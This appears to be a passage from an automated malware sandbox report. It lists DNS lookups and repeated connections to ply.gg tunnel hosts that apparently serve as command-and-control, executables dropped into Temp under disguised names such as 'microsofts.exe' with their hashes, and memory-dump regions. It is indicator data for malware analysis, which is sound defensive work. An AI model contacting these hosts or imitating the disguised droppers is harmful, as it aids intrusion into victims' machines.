| US | 8.8.8.8:53 | 5.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | links-transition.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 147.185.221.17:41958 | links-transition.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fall-sustained.gl.at.ply.gg | udp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 147.185.221.17:41937 | fall-sustained.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe
| MD5 | 4c624867a94fee20d81b9e14755165de |
| SHA1 | 6f5afb06ff6278616f8fb0cd81ad1e164b0fee24 |
| SHA256 | 9a1ef7b5af62c005df90a75846e390e1695ecd18c7727b8e039e4b5842d6f388 |
| SHA512 | 0a40dc67d116b9726c3129a88e82c536273b4ad42f850ca78828b042dc5d20313caf1ee8a8a7136efab6027fa2f7bcf1551fac61f239c10d865f5664a8006064 |
C:\Users\Admin\AppData\Local\Temp\microsofts.exe
| MD5 | 5fdd418baf9c0d789e67758ad9f2dd1a |
| SHA1 | c0be3be193af670cfe01a64aef7c5b0a0b9d091a |
| SHA256 | 82f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47 |
| SHA512 | 9ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50 |
C:\Users\Admin\AppData\Local\Temp\sanas.scr
| MD5 | b7cedaa564e3fb095f94aef59f7ed0da |
| SHA1 | 3f93a84f2d290840cfb5418e15c47dda39ab967d |
| SHA256 | 526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc |
| SHA512 | 18d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d |
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
| MD5 | ea8cd5a2fc982a586ca1bdc96f877758 |
| SHA1 | dda1ea30c49d90608ee25b9a310cc3d7fe73b784 |
| SHA256 | 5d447bce28be94ee602d4e4d0056ac1d2224d2c1a42f91fab4198b51bbeaa81e |
| SHA512 | 1d5f227f366a0c5036637d31e16fe2bc939af37659dec7e2854c341391b6cc572c8f1c6dcb7b2b3245ed012547a01bb620b15afa42c45854eba5e3d60daf51cd |
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
| MD5 | 799c188cf6df366f4c0f98b8800a4977 |
| SHA1 | 161d6006518879ecba6cf45b29599992d8eadfce |
| SHA256 | 32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841 |
| SHA512 | 32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1 |
C:\Users\Admin\AppData\Local\Temp\Server.exe
| MD5 | b9d1be8ae4f4a7a77f309b032a914564 |
| SHA1 | 3b9da974e959adbb0f12705c64fd58e0c8ec5b18 |
| SHA256 | 5f9c9f9af0dc5779d63ea334443d512d675b99c588f2505b652d49d02650c3ba |
| SHA512 | dfadf27f176fe700df9dd9a979e030d362e906a25815eccb1a40c09d8dfee542a75ababbc361833742891fd5d0358233ad68cac05c12aedca1e5d93ae370fc14 |
C:\Users\Admin\AppData\Local\Temp\Server2223.exe
| MD5 | 86757f6c08b6cb698250cc9fc1816a8e |
| SHA1 | fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a |
| SHA256 | 98fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff |
| SHA512 | cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc |
memory/1588-48-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/3204-49-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/1588-50-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/3204-51-0x0000000000E80000-0x0000000000E90000-memory.dmp
memory/3076-53-0x00000000050D0000-0x0000000005106000-memory.dmp
memory/4676-52-0x000000001B340000-0x000000001B3E6000-memory.dmp
memory/4676-55-0x000000001B8C0000-0x000000001BD8E000-memory.dmp
memory/3204-54-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/3076-56-0x0000000005740000-0x0000000005D68000-memory.dmp
memory/4420-59-0x0000000074420000-0x0000000074BD0000-memory.dmp
memory/4676-58-0x000000001BE30000-0x000000001BECC000-memory.dmp
memory/3076-62-0x0000000074420000-0x0000000074BD0000-memory.dmp
memory/4288-64-0x000000001C940000-0x000000001C98C000-memory.dmp
memory/4676-63-0x0000000000CD0000-0x0000000000CD8000-memory.dmp
memory/4288-65-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/3204-67-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/4676-68-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/4288-70-0x0000000001700000-0x0000000001710000-memory.dmp
memory/4676-69-0x0000000000DC0000-0x0000000000DD0000-memory.dmp
memory/4420-71-0x0000000005780000-0x00000000057A2000-memory.dmp
memory/4288-72-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n15di5ft.hxt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3076-85-0x0000000005EE0000-0x0000000005F46000-memory.dmp
memory/3076-90-0x0000000005080000-0x0000000005090000-memory.dmp
memory/3076-74-0x0000000005080000-0x0000000005090000-memory.dmp
memory/1588-91-0x0000000001570000-0x0000000001580000-memory.dmp
memory/4420-92-0x00000000061B0000-0x0000000006504000-memory.dmp
memory/4676-93-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/4420-73-0x00000000058A0000-0x0000000005906000-memory.dmp
memory/4420-98-0x0000000005360000-0x0000000005370000-memory.dmp
memory/4288-100-0x000000001D3A0000-0x000000001D6AE000-memory.dmp
memory/4288-102-0x0000000001700000-0x0000000001710000-memory.dmp
memory/3076-101-0x0000000006690000-0x00000000066AE000-memory.dmp
memory/3076-103-0x0000000006AB0000-0x0000000006AFC000-memory.dmp
memory/4676-104-0x0000000000DC0000-0x0000000000DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\melt.txt
| MD5 | 5389b11510f65424863e2e9724bd65e4 |
| SHA1 | 071102005e3217b50283b71ee33858bb15606549 |
| SHA256 | fecb0cdb9664c0c83a84dff897fecff3773df1d4d5a6fc5c84e2187027315fa7 |
| SHA512 | ba78a6c2619bd7a4d4428a5b0b739e109dfa9ddb8925a005067f8b7091744bd9e16e007d32f62ae42768f3f45fb8aefe496f5a3ef617862127b53a88f86514ff |
memory/4548-119-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/4288-120-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/4548-121-0x0000000000880000-0x0000000000890000-memory.dmp
memory/4548-123-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/2112-124-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/2112-125-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/4420-126-0x0000000005360000-0x0000000005370000-memory.dmp
memory/3076-127-0x0000000005080000-0x0000000005090000-memory.dmp
memory/4676-128-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/1588-130-0x0000000073890000-0x0000000073E41000-memory.dmp
C:\Users\Admin\AppData\Roaming\Server
| MD5 | 0d0aeada15a7006b4bf0cff69abd6dad |
| SHA1 | 0cdb1ad92197a50f16712389f0de7582cd73533c |
| SHA256 | 901678e85e472014f4772e98e608de1b825d2c706af276463d455b4f9336e863 |
| SHA512 | 1eaade55ecab10180ca7e7cd038ceba39598bd63baa048d6e4ec871259cca21bc163c256d92c38a574595d06f6abe87a413788979aea26255a1b5f474a8f0d65 |
memory/4548-135-0x0000000000880000-0x0000000000890000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\melt.txt
| MD5 | fba0a770926236f6ba95be6e970e6b84 |
| SHA1 | 6706c0cf9ce59152c17b887d454c877a9579bd1d |
| SHA256 | 10f09dcc6b21f03ab4293d302475f90c96ccc4b746bb3dcdc1b241bcac03aca6 |
| SHA512 | 700016be260852b8909b69e0fbf26ffc24d3ebfe40604e8f5d8a0bc76dcef861c11b269047ec5b68177dd7f29b8836f92c38864a5a42568f8a1ac8f360fcf252 |
memory/1588-137-0x0000000073890000-0x0000000073E41000-memory.dmp
memory/3076-138-0x0000000006BB0000-0x0000000006BCA000-memory.dmp
memory/3076-136-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/4420-141-0x000000006EB20000-0x000000006EB6C000-memory.dmp
memory/4420-140-0x0000000007720000-0x0000000007752000-memory.dmp
memory/4420-152-0x00000000054C0000-0x00000000054DE000-memory.dmp
memory/3076-157-0x0000000005080000-0x0000000005090000-memory.dmp
memory/4548-159-0x000000001EBB0000-0x000000001ECB0000-memory.dmp
memory/1588-160-0x0000000001570000-0x0000000001580000-memory.dmp
memory/4548-158-0x0000000000880000-0x0000000000890000-memory.dmp
memory/3076-161-0x0000000008B10000-0x00000000090B4000-memory.dmp
memory/4420-163-0x0000000005360000-0x0000000005370000-memory.dmp
memory/3076-164-0x0000000007A60000-0x0000000007AF2000-memory.dmp
memory/4676-162-0x00007FF8285C0000-0x00007FF828F61000-memory.dmp
memory/3076-155-0x0000000005080000-0x0000000005090000-memory.dmp
memory/4676-153-0x0000000000DC0000-0x0000000000DD0000-memory.dmp
memory/4420-154-0x0000000007960000-0x0000000007A03000-memory.dmp
memory/3076-151-0x0000000074420000-0x0000000074BD0000-memory.dmp
memory/4420-139-0x0000000074420000-0x0000000074BD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2308-192-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2308-194-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\fltbew5y.yr1
| MD5 | 69b2a2e17e78d24abee9f1de2f04811a |
| SHA1 | d19c109704e83876ab3527457f9418a7d053aa33 |
| SHA256 | 1b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd |
| SHA512 | eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f |
memory/2308-198-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2308-197-0x0000000000420000-0x00000000004E9000-memory.dmp
memory/844-202-0x0000000000400000-0x0000000000453000-memory.dmp
memory/844-200-0x0000000000400000-0x0000000000453000-memory.dmp
memory/844-209-0x0000000000400000-0x0000000000453000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ytmrj20j.erj
| MD5 | 02524418240369b25b988e9884cd1c54 |
| SHA1 | 42a33322d952edf6d8431d4cd788bbc863d2b890 |
| SHA256 | 80b2a0874c2f734dfe1196d7ae2a7bc6ccb30df2d9281513ac33edc529a71a37 |
| SHA512 | 7c5bbe911f7f0b072d6fdb89ea5759655c2b5cf9ebfddff8f2f67f956141b8ed3697ab0504f60c3992849afbbc79434043a6c04d7cf6ddd958e23354fd3a698f |